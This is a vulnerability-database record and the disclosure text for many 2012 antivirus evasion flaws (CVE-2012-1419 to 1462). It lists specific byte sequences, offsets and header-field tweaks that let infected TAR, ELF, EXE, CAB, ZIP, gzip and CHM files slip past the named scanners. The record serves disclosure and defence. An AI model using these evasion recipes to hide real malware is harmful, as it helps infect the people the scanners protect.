         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.rising-global.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.bitdefender.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.clamav.net/lang/en/",
         },
         {
            title: "Comodo Antivirus",
            trust: 0.8,
            url: "http://www.comodo.com/home/internet-security/antivirus.php",
         },
         {
            title: "Emsisoft Anti-Malware",
            trust: 0.8,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            title: "ESET NOD32アンチウイルス",
            trust: 0.8,
            url: "http://www.eset.com/us/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.fortinet.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.f-prot.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.gdata.co.jp/",
         },
         {
            title: "IKARUS virus.utilities",
            trust: 0.8,
            url: "http://www.ikarus.at/en/ngo-gov/products/virus_utilities/index.html",
         },
         {
            title: "Jiangmin Antivirus",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "K7 AntiVirus",
            trust: 0.8,
            url: "http://www.k7computing.com/en/product/k7-antivirusplus.php",
         },
         {
            title: "MacAfee Scan Engine",
            trust: 0.8,
            url: "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.norman.com/",
         },
         {
            title: "nProtect Anti-Virus",
            trust: 0.8,
            url: "http://global.nprotect.com/product/avs.php",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ps-japan.co.jp/",
         },
         {
            title: "PC Tools AntiVirus",
            trust: 0.8,
            url: "http://www.pctools.com/jp/spyware-doctor-antivirus/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Endpoint Protection",
            trust: 0.8,
            url: "http://www.symantec.com/ja/jp/endpoint-protection",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/home/",
         },
         {
            title: "Trend Micro HouseCall",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/tools/housecall/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://anti-virus.by/en",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.virusbuster.hu/en",
         },
         {
            title: "eSafe",
            trust: 0.8,
            url: "http://www.aladdin.co.jp/esafe/",
         },
         {
            title: "V3 Internet Security",
            trust: 0.8,
            url: "http://www.ahnlab.co.jp/product_service/product/b2b/v3is8.asp",
         },
         {
            title: "Kaspersky Anti-Virus",
            trust: 0.8,
            url: "http://www.kaspersky.com/kaspersky_anti-virus",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.sophos.com",
         },
         {
            title: "Microsoft Security Essentials",
            trust: 0.8,
            url: "http://windows.microsoft.com/ja-jp/windows/products/security-essentials",
         },
         {
            title: "McAfee Web Gateway",
            trust: 0.8,
            url: "http://www.mcafee.com/japan/products/web_gateway.asp",
         },
         {
            title: "F-Secure Anti-Virus",
            trust: 0.8,
            url: "http://www.f-secure.com/ja/web/home_jp/protection/anti-virus/overview",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/bid/52612",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80454",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80455",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80456",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80457",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80458",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80459",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80460",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80461",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80467",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80468",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80469",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80470",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80471",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80472",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1443",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1443",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19198",
         },
         {
            trust: 0.3,
            url: "http://seclists.org/bugtraq/2012/mar/88",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1419",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1439",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1426",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1429",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1436",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1440",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1432",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1438",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1428",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1446",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1443",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1444",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1441",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1421",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1430",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1434",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1435",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1424",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1431",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1425",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1423",
         },
         {
            trust: 0.1,
            url: "http://www.ieee-security.org/tc/sp2012/",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1442",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1422",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1433",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1420",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1427",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1445",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1437",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52612",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            date: "2012-03-19T23:51:01",
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            date: "2012-03-21T10:11:48.083000",
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-11-06T00:00:00",
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            date: "2015-03-19T08:41:00",
            db: "BID",
            id: "52612",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            date: "2012-11-06T05:09:04.360000",
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            date: "2012-04-01T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple products  RAR Vulnerability that prevents file parsers from detecting malware",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
      trust: 0.6,
   },
}

var-201203-0385
Vulnerability from variot

The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. The TAR file parser in multiple products contains a vulnerability that can prevent malware detection. If it is later announced that the problem also exists in different TAR parser implementations, this vulnerability may be split into multiple CVEs. A third party may avoid malware detection via a POSIX TAR file that starts with the character sequence \50\4B\03\04. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. The following products are affected: AVIRA AntiVir Engine 7.11.1.163, Antiy Antiy-AVL 2.0.3.7, Quick Heal Technologies CAT-QuickHeal 11.00, Emsisoft Antivirus 5.1.0.1, Ikarus Antivirus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky Antivirus 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman Antivirus 6.06.12, PCTools Antivirus 7.0.3.5, Symantec AntiVirus 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004. Multiple file-parsing vulnerabilities leading to evasion in different antivirus (AV) products. All affected products are command-line versions of the AVs.

Vulnerability Descriptions

  1. Specially crafted infected POSIX TAR files with "[aliases]" as first 9 bytes evades detection.

Affected products - ClamAV 0.96.4, CAT-QuickHeal 11.00

CVE no - CVE-2012-1419

  1. Specially crafted infected POSIX TAR files with "\7fELF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, Fortinet 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03

CVE no - CVE-2012-1420

  1. Specially crafted infected POSIX TAR files with "MSCF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, Symantec 20101.3.0.103

CVE no - CVE-2012-1421

  1. Specially crafted infected POSIX TAR files with "ITSF" as first 4 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1422

  1. Specially crafted infected POSIX TAR files with "MZ" as first 2 bytes evades detection.

Affected products - Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0

CVE no - CVE-2012-1423

  1. Specially crafted infected POSIX TAR files with "\19\04\00\10" at offset 8 evades detection.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, PCTools 7.0.3.5, Sophos 4.61.0

CVE no - CVE-2012-1424

  1. Specially crafted infected POSIX TAR files with "\50\4B\03\04" as the first 4 bytes evades detection. Specially crafted infected POSIX TAR files with "\42\5A\68" as the first 3 bytes evades detection.

Affected products - CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03

CVE no - CVE-2012-1426

  1. Specially crafted infected POSIX TAR files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1427

  1. Specially crafted infected POSIX TAR files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0

CVE no - CVE-2012-1428

  1. Specially crafted infected ELF files with "ustar" at offset 257 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01

CVE no - CVE-2012-1429

  12. Specially crafted infected ELF files with "\19\04\00\10" at offset 8 evades detection.

Affected products - BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1430

  13. Specially crafted infected ELF files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03

CVE no - CVE-2012-1431

  1. Specially crafted infected MS EXE files with "\57\69\6E\5A\69\70" at offset 29 evades detection.

Affected products - Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1432

  1. Specially crafted infected MS EXE files with "\4a\46\49\46" at offset 6 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1433

  1. Specially crafted infected MS EXE files with "\19\04\00\10" at offset 8 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1434

  1. Specially crafted infected MS EXE files with "\50\4B\4C\49\54\45" at offset 30 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1435

  1. Specially crafted infected MS EXE files with "\2D\6C\68" at offset 2 evades detection.

Affected products - AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7

CVE no - CVE-2012-1436

  1. Specially crafted infected MS Office files with "\50\4B\53\70\58" at offset 526 evades detection.

Affected products - Comodo 7425

CVE no - CVE-2012-1437

  1. Specially crafted infected MS Office files with "ustar" at offset 257 evades detection.

Affected products - Comodo 7425, Sophos 4.61.0

CVE no - CVE-2012-1438

  1. 'padding' field in ELF files is parsed incorrectly. If an infected ELF file's padding field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1439

  1. 'identsize' field in ELF files is parsed incorrectly. If an infected ELF file's identsize field is incremented by 1 it evades detection.

Affected products - Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1440

  1. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.
    If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - Prevx 3.0

'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc', 'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and 'e_oemid' fields in MS EXE files are parsed incorrectly.
If any of these fields in an infected MS EXE file is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0

CVE no - CVE-2012-1441

  1. 'class' field in ELF files is parsed incorrectly.
    If an infected ELF file's class field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1442

  1. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the user and correctly extracted. Such a file evades detection.

Affected products - ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, VirusBuster 13.6.151.0, Fortinet 4.2.254.0, Antiy-AVL 2.0.3.7, K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Jiangmin 13.0.900, Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0, nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, Avast5 5.0.677.0, VBA32 3.12.14.2

CVE no - CVE-2012-1443

  1. 'abiversion' field in ELF files is parsed incorrectly.
    If an infected ELF file's abiversion field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1444

  1. 'abi' field in ELF files is parsed incorrectly.
    If an infected ELF file's abi field is incremented by 1 it evades detection.

Affected products - eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1445

  1. 'encoding' field in ELF files is parsed incorrectly.
    If an infected ELF file's encoding field is incremented by 1 it evades detection. 'e_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's e_version field is incremented by 1 it evades detection.

Affected products - Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7

CVE no - CVE-2012-1447

  1. 'cbCabinet' field in CAB files is parsed incorrectly.
    If an infected CAB file's cbCabinet field is incremented by 1 it evades detection.

Affected products - CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0, TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1

CVE no - CVE-2012-1448

  1. 'vMajor' field in CAB files is parsed incorrectly.
    If an infected CAB file's vMajor field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1449

  1. 'reserved3' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1450

  1. 'reserved2' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved2 field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0

CVE no - CVE-2012-1451

  1. 'reserved1' field in CAB files is parsed incorrectly.
    If an infected CAB file's reserved field is incremented by 1 it evades detection.

Affected products - Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00

CVE no - CVE-2012-1452

  1. 'coffFiles' field in CAB files is parsed incorrectly.
    If an infected CAB file's coffFiles field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1453

  1. 'ei_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's version field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1454

  1. 'vMinor' field in CAB files is parsed incorrectly.
    If an infected CAB file's version field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1455

  1. A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection.

Affected products - AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004

CVE no - CVE-2012-1456

  1. If the length field in the header of a file containing the EICAR test virus, stored in a TAR archive, is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean, but the virus gets extracted correctly by the GNU tar program.

Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0

CVE no - CVE-2012-1457

  1. A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.

If an infected CHM file's header is modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean, but the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.

Affected products - ClamAV 0.96.4, Sophos 4.61.0

CVE no - CVE-2012-1458

  1. In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.

If a TAR archive contains two files (the first one clean, the second infected with the EICAR test virus) and it is modified so that the length field in the header of the first, clean file points into the middle of the header of the second, infected file, the antivirus declares the file to be clean, but the virus gets extracted correctly by the GNU tar program.

Affected products - AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, Fortinet 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0

CVE no - CVE-2012-1459

  1. If 6 random bytes are appended to the end of an infected tar.gz archive, the antivirus declares the file to be clean, but the virus gets extracted correctly by the gunzip+tar programs, which ignore these bytes.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2

CVE no - CVE-2012-1460

  1. GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly

Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2

CVE no - CVE-2012-1461

  1. If 1024 random bytes are prepended to an infected ZIP archive, the antivirus declares the file to be clean, but the virus is still extracted correctly by the unzip program, which skips these bytes.

Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103

CVE no - CVE-2012-1462

